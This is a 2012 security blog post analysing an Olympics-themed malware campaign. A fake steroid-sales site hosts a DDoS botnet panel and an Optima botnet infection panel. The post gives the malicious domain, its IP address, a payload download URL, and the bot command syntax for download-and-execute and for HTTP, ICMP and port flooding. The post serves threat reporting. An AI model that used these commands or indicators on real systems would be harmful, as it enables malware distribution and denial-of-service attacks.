martes, 14 de agosto de 2012

Olimpic Malware: DDOS + INFECTION Attack.


It looks that cyber criminals do not stop searching new ways to spread its viral threats over Internet.

This time they have been taking advantage of the media coverage of the 2012 London Olympics Games. And have used an ingenious method to spread their malware samples with the olimpics promotion.

Criminals have created a false sales page offering steroids and anabolic online. in fact this Site is a pure lure. Selling Steroids is An illegal market that generate enormous profits selling these products unauthorized without prescription and whose consumers try to emulate Olympic athletes using these chemicals substances.

 The malicious URL is

hXXp://steroids-buy-anabolic.com/

and is hosted at the IP 77.79.7.229 from Lituania.

surprisingly, the Machiavellian minds of criminals when analyzing the malicious Web has been discovered a complex system of botnets for denial of service attacks against Internet sites with a certain "reputation" engaged in the illegal sale of steroids and leave them inaccessible to potential buyers.In this way buyers only will find accesible the malicious URL hxxp:// steroids-buy-anabolic.com where they will be infected by Botnet OPTIMA becoming a zombie machine controlled by this Botnet Panel
  
We will go into detail in the analysis of this infrastructure DDoS + INFECTION Botnet Attack.

The oriented BOTNET to perform DDOS attacks is called Minza and its control panel is accessible by the URL hxxp://steroids-buy-anabolic.com/minza/ as seen in the screenshot below:



Once accessed the Control Panel you can see the list of commands that have been released for Denial service atatcks against other websites of illegal steroids trade.




This BOTNET controls 19,147 zombie machines to launch synchronized attacks against the Sites indicated, ordering all the zombies computers to perform simultaneously mass petitions against these sites to collapse their servers.

One of the sites of steroid illegal commerce which the attack has been carried out were:


The commands that the botnet can run are:


Panel also allows to track the actions of compromised bots.

  
For the infection infraestructre criminals have used the Control Panel of OPTIMA BOTNET created by Darkness group.

 This control panel is accessed via the URL:

 hxxp://steroids-buy-anabolic.com/adm/

 And login screen looks like this:



Once accessed the Control Panel shows all information related to botnets and commands that are running on infected machines.

The malicious binary downloaded on compromised machines was:

exe=hXXp://steroids-buy-anabolic.com/upd1.exe

That now has been removed.



The first infection was recorded on 25.05.2012 at 16:14:47, a few months before starts of the Olympic Games, and control 7763 bots in total.

The list of commands that can be executed on the compromised computers are:

exe=http://host.com/exe.exe  -->   Download and execute file
dd1=http://host.com/script.php|5   -->  Start http attack
dd2=host.com|5   --> Start icmp attack
dd3=host.com:21   -->  Start port attack
tot=10   -->  Bots sync time
vot=http://host.com/vote.php  --> Voting
wtf   --> Stop all commands

Below is the record of Bots that controls Optima Bonet Panel:



No hay comentarios:

Publicar un comentario en la entrada

Nota: solo los miembros de este blog pueden publicar comentarios.